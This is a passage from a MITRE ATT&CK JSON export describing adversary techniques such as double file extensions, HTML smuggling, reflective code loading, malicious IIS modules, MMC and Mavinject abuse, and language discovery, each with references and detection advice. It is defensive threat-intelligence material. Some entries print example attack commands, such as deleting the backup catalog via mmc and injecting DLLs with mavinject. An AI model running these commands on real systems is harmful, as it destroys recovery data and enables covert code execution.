attachment named Evil.txt.exe may display as Evil.txt to a user. The user may then view it as a benign text file and open it, inadvertently executing the hidden malware.(Citation: SOCPrime DoubleExtension)\n\nCommon file types, such as text files (.txt, .doc, etc.) and image files (.jpg, .gif, etc.) are typically used as the first extension to appear benign. Executable extensions commonly regarded as dangerous, such as .exe, .lnk, .hta, and .scr, often appear as the second extension and true file type.",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "defense-evasion"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1036/007",
"external_id": "T1036.007"
},
{
"source_name": "PCMag DoubleExtension",
"description": "PCMag. (n.d.). Encyclopedia: double extension. Retrieved August 4, 2021.",
"url": "https://www.pcmag.com/encyclopedia/term/double-extension"
},
{
"source_name": "SOCPrime DoubleExtension",
"description": "Eugene Tkachenko. (2020, May 1). Rule of the Week: Possible Malicious File Double Extension. Retrieved July 27, 2021.",
"url": "https://socprime.com/blog/rule-of-the-week-possible-malicious-file-double-extension/"
},
{
"source_name": "Seqrite DoubleExtension",
"description": "Seqrite. (n.d.). How to avoid dual attack and vulnerable files with double extension?. Retrieved July 27, 2021.",
"url": "https://www.seqrite.com/blog/how-to-avoid-dual-attack-and-vulnerable-files-with-double-extension/"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_data_sources": [
"File: File Creation",
"File: File Metadata"
],
"x_mitre_detection": "Monitor for files written to disk that contain two file extensions, particularly when the second is an executable.(Citation: Seqrite DoubleExtension)",
"x_mitre_is_subtechnique": true,
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.0"
},
{
"type": "attack-pattern",
"id": "attack-pattern--d4dc46e3-5ba5-45b9-8204-010867cacfcb",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-05-20 12:20:42.219000+00:00",
"modified": "2021-10-18 12:03:12.510000+00:00",
"name": "HTML Smuggling",
"description": "Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.(Citation: HTML Smuggling Menlo Security 2020)(Citation: Outlflank HTML Smuggling 2018)\n\nAdversaries may deliver payloads to victims that bypass security controls through HTML Smuggling by abusing JavaScript Blobs and/or HTML5 download attributes. Security controls such as web content filters may not identify smuggled malicious files inside of HTML/JS files, as the content may be based on typically benign MIME types such as text/plain and/or text/html. Malicious files or data can be obfuscated and hidden inside of HTML files through Data URLs and/or JavaScript Blobs and can be deobfuscated when they reach the victim (i.e. [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)), potentially bypassing content filters.\n\nFor example, JavaScript Blobs can be abused to dynamically generate malicious files in the victim machine and may be dropped to disk by abusing JavaScript functions such as msSaveBlob.(Citation: HTML Smuggling Menlo Security 2020)(Citation: MSTIC NOBELIUM May 2021)(Citation: Outlflank HTML Smuggling 2018)(Citation: nccgroup Smuggling HTA 2017)",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "defense-evasion"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1027/006",
"external_id": "T1027.006"
},
{
"source_name": "HTML Smuggling Menlo Security 2020",
"description": "Subramanian, K. (2020, August 18). New HTML Smuggling Attack Alert: Duri. Retrieved May 20, 2021.",
"url": "https://www.menlosecurity.com/blog/new-attack-alert-duri"
},
{
"source_name": "Outlflank HTML Smuggling 2018",
"description": "Hegt, S. (2018, August 14). HTML smuggling explained. Retrieved May 20, 2021.",
"url": "https://outflank.nl/blog/2018/08/14/html-smuggling-explained/"
},
{
"source_name": "MSTIC NOBELIUM May 2021",
"description": "Microsoft Threat Intelligence Center (MSTIC). (2021, May 27). New sophisticated email-based attack from NOBELIUM. Retrieved May 28, 2021.",
"url": "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/"
},
{
"source_name": "nccgroup Smuggling HTA 2017",
"description": "Warren, R. (2017, August 8). Smuggling HTA files in Internet Explorer/Edge. Retrieved May 20, 2021.",
"url": "https://research.nccgroup.com/2017/08/08/smuggling-hta-files-in-internet-explorer-edge/"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"Stan Hegt, Outflank",
"Jonathan Boucher, @crash_wave, Bank of Canada"
],
"x_mitre_data_sources": [
"File: File Creation"
],
"x_mitre_defense_bypassed": [
"Web content filters",
"Anti-virus",
"Static file analysis"
],
"x_mitre_detection": "Detection of HTML Smuggling is difficult as HTML5 and JavaScript attributes are used by legitimate services and applications. HTML Smuggling can be performed in many ways via JavaScript, developing rules for the different variants, with a combination of different encoding and/or encryption schemes, may be very challenging.(Citation: Outlflank HTML Smuggling 2018) Detecting specific JavaScript and/or HTML5 attribute strings such as Blob, msSaveOrOpenBlob, and/or download may be a good indicator of HTML Smuggling. These strings may also be used by legitimate services therefore it is possible to raise false positives.\n\nConsider monitoring files downloaded from the Internet, possibly by HTML Smuggling, for suspicious activities. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities.",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"User"
],
"x_mitre_platforms": [
"Windows",
"Linux",
"macOS"
],
"x_mitre_version": "1.0"
},
{
"type": "attack-pattern",
"id": "attack-pattern--4933e63b-9b77-476e-ab29-761bc5b7d15a",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-10-05 01:15:06.293000+00:00",
"modified": "2021-10-17 15:13:55.615000+00:00",
"name": "Reflective Code Loading",
"description": "Adversaries may reflectively load code into a process in order to conceal the execution of malicious payloads. Reflective loading involves allocating then executing payloads directly within the memory of the process, vice creating a thread or process backed by a file path on disk. Reflectively loaded payloads may be compiled binaries, anonymous files (only present in RAM), or just snubs of fileless executable code (ex: position-independent shellcode).(Citation: Introducing Donut)(Citation: S1 Custom Shellcode Tool)(Citation: Stuart ELF Memory)(Citation: 00sec Droppers)(Citation: Mandiant BYOL)\n\nReflective code injection is very similar to [Process Injection](https://attack.mitre.org/techniques/T1055) except that the \u201cinjection\u201d loads code into the processes\u2019 own memory instead of that of a separate process. Reflective loading may evade process-based detections since the execution of the arbitrary code may be masked within a legitimate or otherwise benign process. Reflectively loading payloads directly into memory may also avoid creating files or other artifacts on disk, while also enabling malware to keep these payloads encrypted (or otherwise obfuscated) until execution.(Citation: Stuart ELF Memory)(Citation: 00sec Droppers)(Citation: Intezer ACBackdoor)(Citation: S1 Old Rat New Tricks)",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "defense-evasion"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1620",
"external_id": "T1620"
},
{
"source_name": "Introducing Donut",
"description": "The Wover. (2019, May 9). Donut - Injecting .NET Assemblies as Shellcode. Retrieved October 4, 2021.",
"url": "https://thewover.github.io/Introducing-Donut/"
},
{
"source_name": "S1 Custom Shellcode Tool",
"description": "Bunce, D. (2019, October 31). Building A Custom Tool For Shellcode Analysis. Retrieved October 4, 2021.",
"url": "https://www.sentinelone.com/blog/building-a-custom-tool-for-shellcode-analysis/"
},
{
"source_name": "Stuart ELF Memory",
"description": "Stuart. (2018, March 31). In-Memory-Only ELF Execution (Without tmpfs). Retrieved October 4, 2021.",
"url": "https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html"
},
{
"source_name": "00sec Droppers",
"description": "0x00pico. (2017, September 25). Super-Stealthy Droppers. Retrieved October 4, 2021.",
"url": "https://0x00sec.org/t/super-stealthy-droppers/3715"
},
{
"source_name": "Mandiant BYOL",
"description": "Kirk, N. (2018, June 18). Bring Your Own Land (BYOL) \u2013 A Novel Red Teaming Technique. Retrieved October 4, 2021.",
"url": "https://www.mandiant.com/resources/bring-your-own-land-novel-red-teaming-technique"
},
{
"source_name": "Intezer ACBackdoor",
"description": "Sanmillan, I. (2019, November 18). ACBackdoor: Analysis of a New Multiplatform Backdoor. Retrieved October 4, 2021.",
"url": "https://www.intezer.com/blog/research/acbackdoor-analysis-of-a-new-multiplatform-backdoor/"
},
{
"source_name": "S1 Old Rat New Tricks",
"description": "Landry, J. (2016, April 21). Teaching an old RAT new tricks. Retrieved October 4, 2021.",
"url": "https://www.sentinelone.com/blog/teaching-an-old-rat-new-tricks/"
},
{
"source_name": "MDSec Detecting DOTNET",
"description": "MDSec Research. (n.d.). Detecting and Advancing In-Memory .NET Tradecraft. Retrieved October 4, 2021.",
"url": "https://www.mdsec.co.uk/2020/06/detecting-and-advancing-in-memory-net-tradecraft/"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"Jo\u00e3o Paulo de A. Filho, @Hug1nN__",
"Joas Antonio dos Santos, @C0d3Cr4zy",
"Shlomi Salem, SentinelOne",
"Lior Ribak , SentinelOne",
"Rex Guo, @Xiaofei_REX, Confluera"
],
"x_mitre_data_sources": [
"Script: Script Execution",
"Process: OS API Execution",
"Module: Module Load"
],
"x_mitre_defense_bypassed": [
"Application control",
"Anti-virus"
],
"x_mitre_detection": "Monitor for code artifacts associated with reflectively loading code, such as the abuse of .NET functions such as Assembly.Load() and [Native API](https://attack.mitre.org/techniques/T1106) functions such as CreateThread(), memfd_create(), execve(), and/or execveat().(Citation: 00sec Droppers)(Citation: S1 Old Rat New Tricks)\n\nMonitor for artifacts of abnormal process execution. For example, a common signature related to reflective code loading on Windows is mechanisms related to the .NET Common Language Runtime (CLR) -- such as mscor.dll, mscoree.dll, and clr.dll -- loading into abnormal processes (such as notepad.exe). Similarly, AMSI / ETW traces can be used to identify signs of arbitrary code execution from within the memory of potentially compromised processes.(Citation: MDSec Detecting DOTNET)(Citation: Introducing Donut)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
"x_mitre_is_subtechnique": false,
"x_mitre_permissions_required": [
"User"
],
"x_mitre_platforms": [
"macOS",
"Linux",
"Windows"
],
"x_mitre_version": "1.0"
},
{
"type": "attack-pattern",
"id": "attack-pattern--b46a801b-fd98-491c-a25a-bca25d6e3001",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-06-03 18:44:29.770000+00:00",
"modified": "2021-10-17 15:06:24.161000+00:00",
"name": "IIS Components",
"description": "Adversaries may install malicious components that run on Internet Information Services (IIS) web servers to establish persistence. IIS provides several mechanisms to extend the functionality of the web servers. For example, Internet Server Application Programming Interface (ISAPI) extensions and filters can be installed to examine and/or modify incoming and outgoing IIS web requests. Extensions and filters are deployed as DLL files that export three functions: Get{Extension/Filter}Version, Http{Extension/Filter}Proc, and (optionally) Terminate{Extension/Filter}. IIS modules may also be installed to extend IIS web servers.(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: IIS Backdoor 2011)(Citation: Trustwave IIS Module 2013)\n\nAdversaries may install malicious ISAPI extensions and filters to observe and/or modify traffic, execute commands on compromised machines, or proxy command and control traffic. ISAPI extensions and filters may have access to all IIS web requests and responses. For example, an adversary may abuse these mechanisms to modify HTTP responses in order to distribute malicious commands/content to previously comprised hosts.(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Extension All Incoming 2017)(Citation: Dell TG-3390)(Citation: Trustwave IIS Module 2013)(Citation: MMPC ISAPI Filter 2012)\n\nAdversaries may also install malicious IIS modules to observe and/or modify traffic. IIS 7.0 introduced modules that provide the same unrestricted access to HTTP requests and responses as ISAPI extensions and filters. IIS modules can be written as a DLL that exports RegisterModule, or as a .NET application that interfaces with ASP.NET APIs to access IIS HTTP requests.(Citation: Microsoft IIS Modules Overview 2007)(Citation: Trustwave IIS Module 2013)(Citation: ESET IIS Malware 2021)",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "persistence"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1505/004",
"external_id": "T1505.004"
},
{
"source_name": "Microsoft ISAPI Extension Overview 2017",
"description": "Microsoft. (2017, June 16). ISAPI Extension Overview. Retrieved June 3, 2021.",
"url": "https://docs.microsoft.com/en-us/previous-versions/iis/6.0-sdk/ms525172(v=vs.90)"
},
{
"source_name": "Microsoft ISAPI Filter Overview 2017",
"description": "Microsoft. (2017, June 16). ISAPI Filter Overview. Retrieved June 3, 2021.",
"url": "https://docs.microsoft.com/en-us/previous-versions/iis/6.0-sdk/ms524610(v=vs.90)"
},
{
"source_name": "IIS Backdoor 2011",
"description": "Julien. (2011, February 2). IIS Backdoor. Retrieved June 3, 2021.",
"url": "https://web.archive.org/web/20170106175935/http:/esec-lab.sogeti.com/posts/2011/02/02/iis-backdoor.html"
},
{
"source_name": "Trustwave IIS Module 2013",
"description": "Grunzweig, J. (2013, December 9). The Curious Case of the Malicious IIS Module. Retrieved June 3, 2021.",
"url": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/the-curious-case-of-the-malicious-iis-module/"
},
{
"source_name": "Microsoft ISAPI Extension All Incoming 2017",
"description": "Microsoft. (2017, June 16). Intercepting All Incoming IIS Requests. Retrieved June 3, 2021.",
"url": "https://docs.microsoft.com/en-us/previous-versions/iis/6.0-sdk/ms525696(v=vs.90)"
},
{
"source_name": "Dell TG-3390",
"description": "Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, August 5). Threat Group-3390 Targets Organizations for Cyberespionage. Retrieved August 18, 2018.",
"url": "https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage"
},
{
"source_name": "MMPC ISAPI Filter 2012",
"description": "MMPC. (2012, October 3). Malware signed with the Adobe code signing certificate. Retrieved June 3, 2021.",
"url": "https://web.archive.org/web/20140804175025/http:/blogs.technet.com/b/mmpc/archive/2012/10/03/malware-signed-with-the-adobe-code-signing-certificate.aspx"
},
{
"source_name": "Microsoft IIS Modules Overview 2007",
"description": "Microsoft. (2007, November 24). IIS Modules Overview. Retrieved June 17, 2021.",
"url": "https://docs.microsoft.com/en-us/iis/get-started/introduction-to-iis/iis-modules-overview"
},
{
"source_name": "ESET IIS Malware 2021",
"description": "Hromcov\u00e1, Z., Cherepanov, A. (2021). Anatomy of Native IIS Malware. Retrieved September 9, 2021.",
"url": "https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Anatomy-Of-Native-Iis-Malware-wp.pdf"
},
{
"source_name": "Unit 42 RGDoor Jan 2018",
"description": "Falcone, R. (2018, January 25). OilRig uses RGDoor IIS Backdoor on Targets in the Middle East. Retrieved July 6, 2018.",
"url": "https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"Wes Hurd"
],
"x_mitre_data_sources": [
"File: File Creation",
"File: File Modification",
"Command: Command Execution"
],
"x_mitre_detection": "Monitor for creation and/or modification of files (especially DLLs on webservers) that could be abused as malicious ISAPI extensions/filters or IIS modules. Changes to %windir%\\system32\\inetsrv\\config\\applicationhost.config could indicate an IIS module installation.(Citation: Microsoft IIS Modules Overview 2007)(Citation: ESET IIS Malware 2021)\n\nMonitor execution and command-line arguments of AppCmd.exe, which may be abused to install malicious IIS modules.(Citation: Microsoft IIS Modules Overview 2007)(Citation: Unit 42 RGDoor Jan 2018)(Citation: ESET IIS Malware 2021)",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"Administrator",
"SYSTEM"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.0"
},
{
"type": "attack-pattern",
"id": "attack-pattern--ffbcfdb0-de22-4106-9ed3-fc23c8a01407",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-09-28 01:36:41.638000+00:00",
"modified": "2021-10-16 00:13:18.889000+00:00",
"name": "MMC",
"description": "Adversaries may abuse mmc.exe to proxy execution of malicious .msc files. Microsoft Management Console, or MMC, is a signed Windows binary and is used in several ways in either its GUI or in a command prompt.(Citation: win_mmc)(Citation: what_is_mmc) MMC can be used to create, open, and save custom consoles that contain administrative tools created by Microsoft, called snap-ins. These snap-ins may be used to manage Windows systems locally or remotely. MMC can also be used to open Microsoft created .msc files to manage system configuration.(Citation: win_msc_files_overview)\n\nFor example, mmc C:\\Users\\foo\\admintools.msc /a will open a custom, saved console msc file in author mode.(Citation: win_mmc) Another common example is mmc gpedit.msc, which will open the Group Policy Editor application window. \n\nAdversaries may use MMC commands to perform malicious tasks. For example, mmc wbadmin.msc delete catalog -quiet deletes the backup catalog on the system (i.e. [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490)) without prompts to the user (Note: wbadmin.msc may only be present by default on Windows Server operating systems).(Citation: win_wbadmin_delete_catalog)(Citation: phobos_virustotal)\n\nAdversaries may also abuse MMC to execute malicious .msc files. For example, adversaries may first create a malicious registry Class Identifier (CLSID) subkey, which uniquely identifies a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) class object.(Citation: win_clsid_key) Then, adversaries may create custom consoles with the \u201cLink to Web Address\u201d snap-in that is linked to the malicious CLSID subkey.(Citation: mmc_vulns) Once the .msc file is saved, adversaries may invoke the malicious CLSID payload with the following command: mmc.exe -Embedding C:\\path\\to\\test.msc.(Citation: abusing_com_reg)",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "defense-evasion"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1218/014",
"external_id": "T1218.014"
},
{
"source_name": "win_mmc",
"description": "Microsoft. (2017, October 16). mmc. Retrieved September 20, 2021.",
"url": "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mmc"
},
{
"source_name": "what_is_mmc",
"description": "Microsoft. (2020, September 27). What is Microsoft Management Console?. Retrieved October 5, 2021.",
"url": "https://docs.microsoft.com/en-us/troubleshoot/windows-server/system-management-components/what-is-microsoft-management-console"
},
{
"source_name": "win_msc_files_overview",
"description": "Brinkmann, M.. (2017, June 10). Windows .msc files overview. Retrieved September 20, 2021.",
"url": "https://www.ghacks.net/2017/06/10/windows-msc-files-overview/"
},
{
"source_name": "win_wbadmin_delete_catalog",
"description": "Microsoft. (2017, October 16). wbadmin delete catalog. Retrieved September 20, 2021.",
"url": "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-delete-catalog"
},
{
"source_name": "phobos_virustotal",
"description": "Phobos Ransomware. (2020, December 30). Phobos Ransomware, Fast.exe. Retrieved September 20, 2021.",
"url": "https://www.virustotal.com/gui/file/0b4c743246478a6a8c9fa3ff8e04f297507c2f0ea5d61a1284fe65387d172f81/detection "
},
{
"source_name": "win_clsid_key",
"description": "Microsoft. (2018, May 31). CLSID Key. Retrieved September 24, 2021.",
"url": "https://docs.microsoft.com/en-us/windows/win32/com/clsid-key-hklm"
},
{
"source_name": "mmc_vulns",
"description": "Boxiner, A., Vaknin, E. (2019, June 11). Microsoft Management Console (MMC) Vulnerabilities. Retrieved September 24, 2021.",
"url": "https://research.checkpoint.com/2019/microsoft-management-console-mmc-vulnerabilities/"
},
{
"source_name": "abusing_com_reg",
"description": "bohops. (2018, August 18). ABUSING THE COM REGISTRY STRUCTURE (PART 2): HIJACKING & LOADING TECHNIQUES. Retrieved September 20, 2021.",
"url": "https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"Wes Hurd"
],
"x_mitre_data_sources": [
"Process: Process Creation",
"File: File Creation",
"Command: Command Execution"
],
"x_mitre_defense_bypassed": [
"Application control",
"Digital Certificate Validation"
],
"x_mitre_detection": "Monitor processes and command-line parameters for suspicious or malicious use of MMC. Since MMC is a signed Windows binary, verify use of MMC is legitimate and not malicious. \n\nMonitor for creation and use of .msc files. MMC may legitimately be used to call Microsoft-created .msc files, such as services.msc or eventvwr.msc. Invoking non-Microsoft .msc files may be an indicator of malicious activity. ",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"User",
"Administrator"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.0"
},
{
"type": "attack-pattern",
"id": "attack-pattern--1bae753e-8e52-4055-a66d-2ead90303ca9",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-09-22 17:45:10.241000+00:00",
"modified": "2021-10-14 22:11:03.446000+00:00",
"name": "Mavinject",
"description": "Adversaries may abuse mavinject.exe to proxy execution of malicious code. Mavinject.exe is the Microsoft Application Virtualization Injector, a Windows utility that can inject code into external processes as part of Microsoft Application Virtualization (App-V).(Citation: LOLBAS Mavinject)\n\nAdversaries may abuse mavinject.exe to inject malicious DLLs into running processes (i.e. [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001)), allowing for arbitrary code execution (ex. C:\\Windows\\system32\\mavinject.exe PID /INJECTRUNNING PATH_DLL).(Citation: ATT Lazarus TTP Evolution)(Citation: Reaqta Mavinject) Since mavinject.exe is digitally signed by Microsoft, proxying execution via this method may evade detection by security products because the execution is masked under a legitimate process. \n\nIn addition to [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001), Mavinject.exe can also be abused to perform import descriptor injection via its /HMODULE command-line parameter (ex. mavinject.exe PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER). This command would inject an import table entry consisting of the specified DLL into the module at the given base address.(Citation: Mavinject Functionality Deconstructed)",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "defense-evasion"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1218/013",
"external_id": "T1218.013"
},
{
"source_name": "LOLBAS Mavinject",
"description": "LOLBAS. (n.d.). Mavinject.exe. Retrieved September 22, 2021.",
"url": "https://lolbas-project.github.io/lolbas/Binaries/Mavinject/"
},
{
"source_name": "ATT Lazarus TTP Evolution",
"description": "Fernando Martinez. (2021, July 6). Lazarus campaign TTPs and evolution. Retrieved September 22, 2021.",
"url": "https://cybersecurity.att.com/blogs/labs-research/lazarus-campaign-ttps-and-evolution"
},
{
"source_name": "Reaqta Mavinject",
"description": "Reaqta. (2017, December 16). From False Positive to True Positive: the story of Mavinject.exe, the Microsoft Injector. Retrieved September 22, 2021.",
"url": "https://reaqta.com/2017/12/mavinject-microsoft-injector/"
},
{
"source_name": "Mavinject Functionality Deconstructed",
"description": "Matt Graeber. (2018, May 29). mavinject.exe Functionality Deconstructed. Retrieved September 22, 2021.",
"url": "https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_data_sources": [
"Process: Process Creation",
"Command: Command Execution"
],
"x_mitre_detection": "Monitor the execution and arguments of mavinject.exe. Compare recent invocations of mavinject.exe with prior history of known good arguments and injected DLLs to determine anomalous and potentially adversarial activity.\n\nAdversaries may rename abusable binaries to evade detections, but the argument INJECTRUNNING is required for mavinject.exe to perform [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001) and may therefore be monitored to alert malicious activity.",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"User"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.0"
},
{
"type": "attack-pattern",
"id": "attack-pattern--c1b68a96-3c48-49ea-a6c0-9b27359f9c19",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-08-18 14:06:45.244000+00:00",
"modified": "2021-10-15 22:00:56.174000+00:00",
"name": "System Language Discovery",
"description": "Adversaries may attempt to gather information about the system language of a victim in order to infer the geographical location of that host. This information may be used to shape follow-on behaviors, including whether the adversary infects the target and/or attempts specific actions. This decision may be employed by malware developers and operators to reduce their risk of attracting the attention of specific law enforcement agencies or prosecution/scrutiny from other entities.(Citation: Malware System Language Check)\n\nThere are various sources of data an adversary could use to infer system language, such as system defaults and keyboard layouts. Specific checks will vary based on the target and/or adversary, but may involve behaviors such as [Query Registry](https://attack.mitre.org/techniques/T1012) and calls to [Native API](https://attack.mitre.org/techniques/T1106) functions.(Citation: CrowdStrike Ryuk January 2019) \n\nFor example, on a Windows system adversaries may attempt to infer the language of a system by querying the registry key HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Nls\\Language or parsing the outputs of Windows API functions GetUserDefaultUILanguage, GetSystemDefaultUILanguage, GetKeyboardLayoutList and GetUserDefaultLangID.(Citation: Darkside Ransomware Cybereason)(Citation: Securelist JSWorm)(Citation: SecureList SynAck Doppelg\u00e4nging May 2018)\n\nOn a macOS or Linux system, adversaries may query locale to retrieve the value of the $LANG environment variable.",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "discovery"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1614/001",
"external_id": "T1614.001"
},
{
"source_name": "Malware System Language Check",
"description": "Pierre-Marc Bureau. (2009, January 15). Malware Trying to Avoid Some Countries. Retrieved August 18, 2021.",
"url": "https://www.welivesecurity.com/2009/01/15/malware-trying-to-avoid-some-countries/"
},
{
"source_name": "CrowdStrike Ryuk January 2019",
"description": "Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020.",
"url": "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/"
},
{
"source_name": "Darkside Ransomware Cybereason",
"description": "Cybereason Nocturnus. (2021, April 1). Cybereason vs. Darkside Ransomware. Retrieved August 18, 2021.",
"url": "https://www.cybereason.com/blog/cybereason-vs-darkside-ransomware"
},
{
"source_name": "Securelist JSWorm",
"description": "Fedor Sinitsyn. (2021, May 25). Evolution of JSWorm Ransomware. Retrieved August 18, 2021.",
"url": "https://securelist.com/evolution-of-jsworm-ransomware/102428/"
},
{
"source_name": "SecureList SynAck Doppelg\u00e4nging May 2018",
"description": "Ivanov, A. et al. (2018, May 7). SynAck targeted ransomware uses the Doppelg\u00e4nging technique. Retrieved May 22, 2018.",
"url": "https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"Harshal Tupsamudre, Qualys"
],
"x_mitre_data_sources": [
"Windows Registry: Windows Registry Key Access",
"Process: Process Creation",
"Process: OS API Execution",
"Command: Command Execution"
],
"x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system language information. This may include calls to various API functions and interaction with system configuration settings such as the Windows Registry.",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"User"
],
"x_mitre_platforms": [
"Windows",
"Linux",
"macOS"
],
"x_mitre_version": "1.0"
}
],
"major_version_changes": [
{
"type": "attack-pattern",
"id": "attack-pattern--035bb001-ab69-4a0b-9f6c-2de8b09e1b9d",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2020-02-11 19:07:12.114000+00:00",
"modified": "2021-09-28 13:09:51.467000+00:00",
"name": "Adversary-in-the-Middle",
"description": "Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique to support follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.(Citation: Rapid7 MiTM Basics)\n\nAdversaries may leverage the AiTM position to attempt to modify traffic, such as in [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). Adversaries can also stop traffic from flowing to the appropriate destination, causing denial of service.",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "credential-access"
},
{
"kill_chain_name": "mitre-attack",
"phase_name": "collection"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1557",
"external_id": "T1557"
},
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/94.html",
"external_id": "CAPEC-94"
},
{
"source_name": "Rapid7 MiTM Basics",
"description": "Rapid7. (n.d.). Man-in-the-Middle (MITM) Attacks. Retrieved March 2, 2020.",
"url": "https://www.rapid7.com/fundamentals/man-in-the-middle-attacks/"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"Daniil Yugoslavskiy, @yugoslavskiy, Atomic Threat Coverage project"
],
"x_mitre_data_sources": [
"Network Traffic: Network Traffic Content",
"Network Traffic: Network Traffic Flow",
"Service: Service Creation",
"Windows Registry: Windows Registry Key Modification"
],
